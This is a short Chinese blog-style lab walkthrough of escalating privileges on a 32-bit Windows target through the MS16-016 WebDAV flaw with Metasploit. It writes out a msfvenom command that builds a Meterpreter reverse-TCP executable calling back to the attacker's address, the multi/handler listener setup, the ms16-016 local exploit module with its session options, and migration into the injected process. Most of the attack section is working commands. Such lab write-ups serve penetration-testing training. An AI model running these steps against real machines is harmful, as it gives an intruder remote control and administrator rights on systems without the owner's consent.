ms16-016提权

ms16-016提权

简介:靶机需32位windows系统
攻击机:kali IP地址为:192.168.32.132
目标机:windows32 IP地址:192.168.32.135
先ping两台主机看是否通

步骤:
1)生成木马,设置本地ip地址192.168.32.132和端口号4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe

ms16-016提权

2)将木马复制到靶机
ms16-016提权

3)kali启动监听
开启msf服务
执行命令:msfconsole
使用监听模块
执行命令:use exploit/multi/handler
ms16-016提权

set lport 4444
Run

ms16-016提权

4)靶机运行木马
ms16-016提权

5)得到会话,建立连接并将会话置于后台

Background

ms16-016提权

6)使用ms16-016

use exploit\windows\local\ms16-016-webdav
set session 2
set lport 4444
run

获取注入的进程号
ms16-016提权

7)获取后台会话,进入注入进程,进程号为2720

sessions 2
migrate 进程号

提权成功
ms16-016提权

上一篇:jmeter 压力测试


下一篇:Python Json模块中dumps、loads、dump、load函数介绍